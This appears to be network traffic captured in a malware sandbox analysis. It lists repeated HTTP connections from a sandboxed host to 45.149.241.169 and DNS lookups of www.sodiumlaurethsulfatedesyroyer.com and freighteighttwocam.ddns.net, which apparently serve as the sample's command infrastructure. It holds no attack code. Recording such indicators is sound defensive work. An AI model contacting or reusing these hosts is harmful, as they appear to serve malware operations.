                                                          Oct 3, 2024 09:22:15.434931993 CEST804978345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:16.293493032 CEST804978345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:16.293625116 CEST4978380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:16.293680906 CEST804978345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:16.293740988 CEST4978380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:16.298894882 CEST804978345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:16.432843924 CEST4978480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:16.446443081 CEST804978445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:16.446552038 CEST4978480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:16.448915005 CEST4978480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:16.459136963 CEST804978445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:16.459229946 CEST4978480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:16.464576960 CEST804978445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:18.382441044 CEST804978445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:18.382467985 CEST804978445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:18.382621050 CEST4978480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:18.382621050 CEST4978480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:18.387414932 CEST804978445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:18.524291992 CEST4978580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:18.529395103 CEST804978545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:18.529489040 CEST4978580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:18.535527945 CEST4978580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:18.541210890 CEST804978545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:18.541296005 CEST4978580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:18.546160936 CEST804978545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:19.163856983 CEST804978545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:19.163908005 CEST804978545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:19.163958073 CEST4978580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:19.163958073 CEST4978580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:19.168785095 CEST804978545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:19.311017990 CEST4978680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:19.315948963 CEST804978645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:19.316039085 CEST4978680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:19.318485975 CEST4978680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:19.323304892 CEST804978645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:19.323390961 CEST4978680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:19.328119993 CEST804978645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:19.984327078 CEST804978645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:19.984519958 CEST4978680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:19.984637976 CEST804978645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:19.984708071 CEST4978680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:19.989578962 CEST804978645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:20.127672911 CEST4978780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:20.132916927 CEST804978745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:20.133014917 CEST4978780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:20.140371084 CEST4978780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:20.145294905 CEST804978745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:20.145363092 CEST4978780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:20.150312901 CEST804978745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:20.837774992 CEST804978745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:20.837934017 CEST4978780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:20.838172913 CEST804978745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:20.838219881 CEST4978780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:20.842772961 CEST804978745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:20.979898930 CEST4978880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:20.984930038 CEST804978845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:20.985060930 CEST4978880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:20.987117052 CEST4978880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:20.992095947 CEST804978845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:20.992218018 CEST4978880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:20.997162104 CEST804978845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:21.745456934 CEST804978845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:21.745522976 CEST804978845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:21.745605946 CEST4978880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:21.750540018 CEST804978845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:21.884987116 CEST4978980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:21.890209913 CEST804978945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:21.890299082 CEST4978980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:21.894581079 CEST4978980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:21.899477005 CEST804978945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:21.900605917 CEST4978980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:21.905448914 CEST804978945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:22.564635992 CEST804978945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:22.564693928 CEST804978945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:22.564889908 CEST4978980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:22.564974070 CEST4978980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:22.569890976 CEST804978945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:22.717561960 CEST4979080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:22.723436117 CEST804979045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:22.723547935 CEST4979080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:22.725519896 CEST4979080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:22.731374025 CEST804979045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:22.731443882 CEST4979080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:22.737194061 CEST804979045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:23.426518917 CEST804979045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:23.426588058 CEST804979045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:23.426654100 CEST4979080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:23.426688910 CEST4979080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:23.432070017 CEST804979045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:23.574027061 CEST4979180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:23.579144001 CEST804979145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:23.583472967 CEST4979180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:23.585536003 CEST4979180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:23.590387106 CEST804979145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:23.590473890 CEST4979180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:23.595294952 CEST804979145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:24.372764111 CEST804979145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:24.372920036 CEST4979180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:24.373985052 CEST804979145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:24.374058962 CEST4979180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:24.378030062 CEST804979145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:24.506123066 CEST4979280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:24.511260986 CEST804979245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:24.511368990 CEST4979280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:24.513129950 CEST4979280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:24.517986059 CEST804979245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:24.518059969 CEST4979280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:24.522907972 CEST804979245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:25.207048893 CEST804979245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:25.207118034 CEST804979245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:25.207192898 CEST4979280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:25.207226038 CEST4979280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:25.212157965 CEST804979245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:25.356015921 CEST4979380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:25.361082077 CEST804979345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:25.361216068 CEST4979380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:25.363157988 CEST4979380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:25.368185997 CEST804979345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:25.368288040 CEST4979380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:25.373281956 CEST804979345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:26.051245928 CEST804979345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:26.051311016 CEST804979345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:26.051444054 CEST4979380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:26.051444054 CEST4979380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:26.056641102 CEST804979345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:26.195457935 CEST4979480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:26.200495005 CEST804979445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:26.200612068 CEST4979480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:26.202344894 CEST4979480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:26.207185030 CEST804979445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:26.207257986 CEST4979480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:26.212097883 CEST804979445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:26.870814085 CEST804979445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:26.870877028 CEST804979445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:26.870939016 CEST4979480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:26.870989084 CEST4979480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:26.875900984 CEST804979445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:27.009438038 CEST4979580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:27.014866114 CEST804979545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:27.014988899 CEST4979580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:27.017453909 CEST4979580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:27.022388935 CEST804979545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:27.022465944 CEST4979580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:27.027369976 CEST804979545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:27.946026087 CEST804979545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:27.946084976 CEST804979545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:27.946191072 CEST4979580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:27.946245909 CEST4979580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:27.950982094 CEST804979545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:28.104796886 CEST4979680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:28.110049963 CEST804979645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:28.110129118 CEST4979680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:28.112184048 CEST4979680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:28.117260933 CEST804979645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:28.117331028 CEST4979680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:28.122212887 CEST804979645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:28.768294096 CEST804979645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:28.768353939 CEST804979645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:28.768532991 CEST4979680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:28.768577099 CEST4979680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:28.773427010 CEST804979645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:28.915775061 CEST4979780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:28.920845032 CEST804979745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:28.920944929 CEST4979780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:28.922904015 CEST4979780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:28.927774906 CEST804979745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:28.927858114 CEST4979780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:28.932878017 CEST804979745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:29.580168962 CEST804979745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:29.580351114 CEST4979780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:29.580671072 CEST804979745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:29.580728054 CEST4979780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:29.585336924 CEST804979745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:29.734622002 CEST4979880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:29.739700079 CEST804979845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:29.739845037 CEST4979880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:29.741869926 CEST4979880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:29.746881962 CEST804979845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:29.746973038 CEST4979880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:29.751835108 CEST804979845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:30.493874073 CEST804979845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:30.493899107 CEST804979845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:30.494085073 CEST4979880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:30.494191885 CEST4979880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:30.499155045 CEST804979845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:30.642625093 CEST4979980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:30.647440910 CEST804979945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:30.647519112 CEST4979980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:30.649540901 CEST4979980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:30.654344082 CEST804979945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:30.654397011 CEST4979980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:30.659251928 CEST804979945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:31.469435930 CEST804979945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:31.469497919 CEST804979945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:31.469549894 CEST4979980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:31.469549894 CEST4979980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:31.474478960 CEST804979945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:31.620973110 CEST4980080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:31.626020908 CEST804980045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:31.626152992 CEST4980080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:31.628278971 CEST4980080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:31.633156061 CEST804980045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:31.633255959 CEST4980080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:31.638143063 CEST804980045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:32.287770987 CEST804980045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:32.287904978 CEST804980045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:32.287997961 CEST4980080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:32.291906118 CEST4980080192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:32.296880007 CEST804980045.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:32.589555979 CEST4980180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:32.752104044 CEST804980145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:32.752338886 CEST4980180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:32.754582882 CEST4980180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:32.759432077 CEST804980145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:32.759509087 CEST4980180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:32.764318943 CEST804980145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:33.477503061 CEST804980145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:33.477701902 CEST804980145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:33.477823019 CEST4980180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:33.478122950 CEST4980180192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:33.482940912 CEST804980145.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:33.624550104 CEST4980280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:33.629590988 CEST804980245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:33.629717112 CEST4980280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:33.631897926 CEST4980280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:33.636739016 CEST804980245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:33.636826038 CEST4980280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:33.641805887 CEST804980245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:34.399502039 CEST804980245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:34.399748087 CEST804980245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:34.400048971 CEST4980280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:34.400048971 CEST4980280192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:34.404989958 CEST804980245.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:34.552184105 CEST4980380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:34.559056997 CEST804980345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:34.559149027 CEST4980380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:34.561244965 CEST4980380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:34.567374945 CEST804980345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:34.567445993 CEST4980380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:34.573415995 CEST804980345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:35.265968084 CEST804980345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:35.266083002 CEST804980345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:35.266278028 CEST4980380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:35.266278982 CEST4980380192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:35.271094084 CEST804980345.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:35.399912119 CEST4980480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:35.404871941 CEST804980445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:35.404987097 CEST4980480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:35.407145977 CEST4980480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:35.411952972 CEST804980445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:35.412081957 CEST4980480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:35.416852951 CEST804980445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:36.047740936 CEST804980445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:36.047781944 CEST804980445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:36.047866106 CEST4980480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:36.047908068 CEST4980480192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:36.052803993 CEST804980445.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:36.182019949 CEST4980580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:36.188112020 CEST804980545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:36.188338995 CEST4980580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:36.190355062 CEST4980580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:36.195821047 CEST804980545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:36.196016073 CEST4980580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:36.201155901 CEST804980545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:36.840380907 CEST804980545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:36.840523958 CEST4980580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:36.840708017 CEST804980545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:36.840755939 CEST4980580192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:36.845617056 CEST804980545.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:36.984582901 CEST4980680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:36.990446091 CEST804980645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:36.990598917 CEST4980680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:36.993830919 CEST4980680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:36.998756886 CEST804980645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:36.999089003 CEST4980680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:37.004026890 CEST804980645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:37.715905905 CEST804980645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:37.716250896 CEST4980680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:37.716289997 CEST804980645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:37.716448069 CEST4980680192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:37.721157074 CEST804980645.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:37.857374907 CEST4980780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:37.862395048 CEST804980745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:37.862495899 CEST4980780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:37.864594936 CEST4980780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:37.869488001 CEST804980745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:37.869566917 CEST4980780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:37.874440908 CEST804980745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:40.206928015 CEST804980745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:40.206954956 CEST804980745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:40.207040071 CEST4980780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:40.207582951 CEST4980780192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:40.212403059 CEST804980745.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:40.369167089 CEST4980880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:40.374332905 CEST804980845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:40.374485970 CEST4980880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:40.381808996 CEST4980880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:40.386639118 CEST804980845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:40.386730909 CEST4980880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:40.391565084 CEST804980845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:41.026272058 CEST804980845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:41.026294947 CEST804980845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:41.026370049 CEST4980880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:41.026370049 CEST4980880192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:41.031299114 CEST804980845.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:41.169219017 CEST4980980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:41.273029089 CEST804980945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:41.273348093 CEST4980980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:41.275152922 CEST4980980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:41.280455112 CEST804980945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:41.280592918 CEST4980980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:41.285872936 CEST804980945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:41.948029995 CEST804980945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:41.948054075 CEST804980945.149.241.169192.168.2.10
                                                          Oct 3, 2024 09:22:41.948129892 CEST4980980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:41.948183060 CEST4980980192.168.2.1045.149.241.169
                                                          Oct 3, 2024 09:22:41.953120947 CEST804980945.149.241.169192.168.2.10
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 3, 2024 09:20:40.835608006 CEST5537253192.168.2.101.1.1.1
                                                          Oct 3, 2024 09:20:40.848423004 CEST53553721.1.1.1192.168.2.10
                                                          Oct 3, 2024 09:20:46.675252914 CEST6189453192.168.2.101.1.1.1
                                                          Oct 3, 2024 09:20:46.689939976 CEST53618941.1.1.1192.168.2.10
                                                          Oct 3, 2024 09:21:46.617948055 CEST6022453192.168.2.101.1.1.1
                                                          Oct 3, 2024 09:21:46.627782106 CEST53602241.1.1.1192.168.2.10
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Oct 3, 2024 09:20:40.835608006 CEST192.168.2.101.1.1.10x7b9Standard query (0)www.sodiumlaurethsulfatedesyroyer.comA (IP address)IN (0x0001)false
                                                          Oct 3, 2024 09:20:46.675252914 CEST192.168.2.101.1.1.10xc7bStandard query (0)freighteighttwocam.ddns.netA (IP address)IN (0x0001)false
                                                          Oct 3, 2024 09:21:46.617948055 CEST192.168.2.101.1.1.10xd8a7Standard query (0)freighteighttwocam.ddns.netA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Oct 3, 2024 09:20:40.848423004 CEST1.1.1.1192.168.2.100x7b9No error (0)www.sodiumlaurethsulfatedesyroyer.com188.114.97.3A (IP address)IN (0x0001)false
                                                          Oct 3, 2024 09:20:40.848423004 CEST1.1.1.1192.168.2.100x7b9No error (0)www.sodiumlaurethsulfatedesyroyer.com188.114.96.3A (IP address)IN (0x0001)false
